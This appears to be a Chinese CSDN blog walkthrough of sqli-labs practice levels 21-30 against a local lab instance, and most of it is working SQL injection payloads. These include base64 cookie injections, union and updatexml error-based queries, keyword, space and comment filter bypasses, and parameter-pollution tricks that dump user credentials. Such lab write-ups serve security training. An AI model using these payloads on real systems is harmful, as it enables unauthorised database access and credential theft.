sqli-labs靶场通关攻略(21-30)

已于 2024-08-25 14:35:24 修改
阅读量1k 收藏 27
点赞数 35
文章标签: sql
于 2024-08-22 20:09:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80402555/article/details/141436281
版权

Less-21

1、输入admin 123456 登录,然后用burpsuite抓包

2、将数据包发送至repeater,在Cookie后输入'报错,判断闭合方式为 ') #

对所写代码进行如下操作:选中右击->Convert selection->Base64->Base64-encode

3、判断列数

') order by 4 #  =>  Jykgb3JkZXIgYnkgNCAj

') order by 3 #  =>  Jykgb3JkZXIgYnkgMyAj

4、查询回显点

') union select 1,2,3 #   =>  JykgdW5pb24gc2VsZWN0IDEsMiwzICM=

5、查询数据库名

') union select 1,2,database() #  =>  JykgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpICM=

6、查表名

') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #    => JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknICM=

7、查users表中的列名

') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #    =>

JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSwzIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgYW5kIHRhYmxlX25hbWU9J3VzZXJzJyAj

8、查询表中所有数据

') union select 1,2,group_concat(id,username,password) from users #    =>

JykgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQoaWQsdXNlcm5hbWUscGFzc3dvcmQpIGZyb20gdXNlcnMgIw==

Less-22

1、输入admin 123456 登录,使用burpsuite抓包

2、在Cookie后输入'报错,判断闭合方式为" #

对所写代码进行如下操作:选中右击->Convert selection->Base64->Base64-encode

3、判断列数

" order by 4 #  =>  IiBvcmRlciBieSA0ICM=

" order by 3 #  =>  IiBvcmRlciBieSAzICM=

4、查询回显点

" union select 1,2,3 #   =>  IiB1bmlvbiBzZWxlY3QgMSwyLDMgIw==

5、查询数据库

" union select 1,2,database() #  =>  IiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkgIw==

6、查表名

" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #    =>

IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgIw==

7、查列名

代码:" union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #    =>

IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQoY29sdW1uX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5JyBhbmQgdGFibGVfbmFtZT0ndXNlcnMnICM=

8、查询表中所有数据

" union select 1,2,group_concat(id,username,password) from users #  =>

IiB1bmlvbiBzZWxlY3QgMSwyLGdyb3VwX2NvbmNhdChpZCx1c2VybmFtZSxwYXNzd29yZCkgZnJvbSB1c2VycyAj

Less-23

1、用?id=1 --+有数据

                用?id=1 #有数据

发现--+和#过滤

2、判断闭合方式:?id=1' and ' 1 ' =' 1

3、查询回显参数

http://127.0.0.1/less-23/?id=-1%27%20union%20select%201,2,3%20and%20%27%201%20%27%20=%27%201

4、查询数据库

http://127.0.0.1/less-23/?id=-1%27%20union%20select%201,database(),3%20and%20%27%201%20%27%20=%27%201

5、查表名

http://127.0.0.1/less-23/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20and%20%27%201%20%27%20=%27%201

6、查列名

http://127.0.0.1/less-23/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20and%20%27%201%20%27%20=%27%201

Less-24

1、注册新用户

2、登录->修改密码

修改成功

Less-25

1、界面显示 or 和 and 被过滤

利用联合查询闭合方式为id=1' --+

2、查回显参数

http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,2,3%20--+

3、查询数据库

http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,database(),3%20--+

4、查表名

http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27%20--+

5、查列名

http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20infoorrmation_schema.columns%20where%20table_schema=%27security%27%20anandd%20table_name=%27users%27%20--+

6、查所有数据

http://127.0.0.1/less-25/?id=-1%27union%20select%201,group_concat(username,0x3a,passwoorrd),3%20from%20users%20--+

Less-26

1、判断闭合方式、

在使用1' and' 闭合时,发现注释符以及空格被过滤了,使用双写或&&和||替换  空格用括号替换

2、查看数据库名

?id=1'||(updatexml(1,concat(1,(select(database()))),1))||'

3、查看数据库表名

?id=1'||(updatexml(1,concat(1,(select(group_concat(table_name)) from (infoorrmation_schema.tables)where(table_schema='security'))),1))||'                                

4、查看users表中的列名

?id=1'||(updatexml(1,concat(1,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='security'aandnd(table_name='users')))),1))||'

5、查看users表内所有内容

?id=1'||(updatexml(1,concat(1,(select(group_concat(passwoorrd,username))from(users))),1))||'

Less-27

1、本关过滤了空格,union 以及select,可以尝试大小写绕过,空格可以用%09替换

2、查询数据库名

?id=1'and%09updatexml(1,concat(1,(sElect%09database())),1)and'

3、查询数据库中的表

?id=1'and%09updatexml(1,concat(1,(sElect%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema='security')),1)and'

4、查询users表中的列

?id=1'and%09updatexml(1,concat(1,(sElect%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_schema='security'%09and%09table_name='users')),1)and'

5、查询users表中所有字段

?id=1'and%09updatexml(1,concat(1,(sElect%09group_concat(username,password)%09from%09users)),1)and'

Less-28

1、本关过滤了空格,union和select,空格用%0A替换,union select使用双写替换

2、查看表名

?id=99')uniunion%0Aselecton%0Aselect%0A1,2,group_concat(table_name)from%0Ainformation_schema.tables%0Awhere%0Atable_schema='security'and ('1

3、查询users表中列名

?id=99')uniunion%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema='security'%0Aand%0Atable_name='users'%0Aand('1

Less-29

1、对输入的参数进行校验是否为数字,但是在对参数值进行校验之前的提取时候只提取了第一个id值,如果我们有两个id参数,第一个id参数正常数字,第二个id参数进行sql注入

2、查询数据库名

?id=1&id=-1'union select 1,database(),3 --+

3、查询数据库中的表名

?id=1&id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

4、查看users表中列名

?id=1&id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

5、查看users表中所有字段

?id=1&id=-1'union select 1,2,group_concat(id,username,password) from users --+

Less-30

1、 对输入的参数进行校验是否为数字,但是在对参数值进行校验之前的提取时候只提取了第一个id值,如果我们有两个id参数,第一个id参数正常数字,第二个id参数进行sql注入

2、查询数据库名

?id=1&id=-1"union select 1,database(),3 --+

3、查询数据库中的表名

?id=1&id=-1"union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

4、查询users表中的列

?id=1&id=-1"union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

5、查询users表中所有字段

?id=1&id=-1"union select 1,2,group_concat(id,username,password) from users --+

L黎蕊
关注
sqli-labs靶场通关攻略
test_zpx的博客
08-14 475
Good Good Study,Day Day Up!
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 15万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs-master靶场通关
m0_75208155的博客
08-12 870
sqli-labs-master靶场通关
SQL注入之SQLI-LABS靶场通关秘籍
Sunnie_yoo的博客
07-03 1277
反之,参数不符合规范,则会触发报错,我们就是利用这个,通过 updatexml() 函数的报错回显我们需要的信息。注入流程与 Less-5 类似,不过这里的判断标准不是回显的信息,而是响应时间。因此网页存在字符型注入漏洞,并且使用单引号和括号进行闭合,注意到此网页并没有返回任何信息,我们需要使用 Bool 盲注进行注入。注入万能密码试试,用户名随便写点东西,使用 OR 运算符构造恒真条件,使用“#”注释掉后面的内容注入,网页提示我们注入成功,由于此时使用的时单引号闭合,因此这里是字符型注入。
sqli-labs靶场通关攻略(一到十关)
2301_81881972的博客
08-14 993
判断数据库第一位字符的ascii码是否大于115 页面正常显示不延迟3秒说明不大于, 大于114不大于115 说明第一位字符ascii码等于115。判断数据库第一位字符的ascii码是否大于115 页面正常显示不延迟3秒说明不大于, 大于114不大于115 说明第一位字符ascii码等于115。用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114。
Sqli-labs靶场1-20通关宝典
2203_75440207的博客
05-18 2217
本文章主要是关于sqli-labs靶场1-20关的通关方法
sqli-labs靶场通关攻略(1-75)
shw_yzh的博客
08-14 1023
sqli-labs靶场超级细通关攻略
sqli-labs靶场通关攻略(1-20关)
kknifek的博客
08-14 509
sql手工注入
sqli-labs靶场通关攻略(16-20关)
Nai_zui_jiang的博客
08-21 1489
")")
Sqli-labs靶场通关(1-20关)
2301_77977773的博客
07-03 544
为了不影响 80 端口的服务,我们可以设置 Apache 服务的端口为82这是因为主机本身已经存在 MySQL 服务,我们可以不使用 php-study 配置中的 MySQL,就用主机本身即可,但版本可能需要注意,我这里使用的 5.7.351.安装sqli-labs-master到phpstudy_pro中的WWW/目录下2.修改phpstudy_pro\WWW\sqli-labs-master\sql-connections的db-creds.inc文件。
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1906
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1435
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 735
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
Sqli-labs靶场21、22关详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 1091
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
Sqli-labs靶场详细攻略Less 29-33
qq_41755084的博客
10-27 1643
这一关在web应用前有一个waf,在关卡列表界面直接点开是没有的,要在地址栏输入才是有waf保护的界面其实这里并不是真正的硬件waf,只是有两个函数模拟了waf的功能和收到参数的反应。sqlilabs靶场也提供了能够部署真正硬件waf的代码,不过随着时代的发展,waf也在变化,专门配置这样一个waf也没太有必要,直接使用这个模拟题目的就好了。这一关在正常配置waf的情况下,的结构图如下所示客户端在访问服务器端时,需要先经过一个tomcat服务器,这个tomcat服务器中部署的过滤代码充当了waf。
sql server每天定时执行sql语句
最新发布
doubleintfloat的博客
09-27 359
2、鼠标右击【SQL Server 代理】,选择【启动(S)】,如已启动,可以省略此步骤;3、右键,新建-》作业,在作业上-》新建作业,然后在作业上右键-》属性。1、打开SQL Server Management Studio。结果如下 , 定时每个10秒向数据库里插入一条数据。作业名称,数据库语句。
Linux云计算 |【第四阶段】NOSQL-DAY2
小安的运维专栏
09-26 1129
Redis集群概述、部署Redis集群(配置manage管理集群主机、创建集群、访问集群、添加节点、移除节点)
Python 课程18-SQLAlchemy
tim654654的博客
09-25 1188
SQLAlchemy ORM 中,表结构通过 Python 类表示。每个类代表数据库中的一张表,类的属性代表表中的列。定义模型类__tablename__ = 'users' # 表名SQLAlchemy 的func模块使得我们能够使用数据库中的聚合函数,如COUNTSUMMAX等。聚合查询# 查询用户的最大年龄# 计算特定条件下的总人数。
渗透测试工具 sqlmap 基础教程
2301_77160226的博客
09-25 735
一旦发现漏洞,sqlmap 可以自动利用漏洞获取数据库中的敏感信息,甚至可以获取数据库服务器的操作系统权限。sqlmap 是一款非常强大的渗透测试工具,它可以帮助我们快速检测和利用 SQL 注入漏洞。在使用 sqlmap 进行渗透测试时,一定要遵守法律法规,确保获得了合法的授权,并注意不要对目标系统造成过大的影响。在网络安全领域,渗透测试是一项至关重要的工作,它可以帮助我们发现系统中的安全漏洞,从而采取相应的措施进行修复。2.在 Windows 系统中,可以从 sqlmap 的官方网站下载安装包进行安装。
sqli-labs靶场通关
08-25
对于sqli-labs靶场通关,你需要具备一定的SQL注入的知识和技巧。以下是一些通关的步骤和提示: 1. 确保你已经安装了LAMP/WAMP/MAMP服务器环境,并将sqli-labs源码解压到Web服务器的根目录下。 2. 打开浏览器,访问sqli-labs的首页,通常是 http://localhost/sqli-labs/。 3. 在首页上,你会看到一系列的级别和挑战。从级别1开始,逐步挑战更高级别的注入漏洞。 4. 阅读每个级别的说明和提示,理解目标和漏洞类型。 5. 使用SQL注入的技巧来寻找漏洞并进行利用。一些常见的注入技巧包括:使用单引号、双引号绕过输入过滤、使用UNION SELECT语句、使用注释符绕过过滤、使用布尔盲注等。 6. 尝试不同的Payload(载荷)来获取敏感信息或执行恶意操作。例如,获取数据库的表名、列名、数据内容,或者尝试修改数据库中的数据。 7. 当你成功获取到关键信息或者完成了特定的目标,即可认为通关。 需要注意的是,在进行sqli-labs靶场挑战时,请确保你在合法的环境中进行,不要尝试攻击他人的系统或进行非法活动。同时,及时备份并恢复你的环境,以防误操作导致数据丢失。 希望这些步骤和提示对你有所帮助!如有更多问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值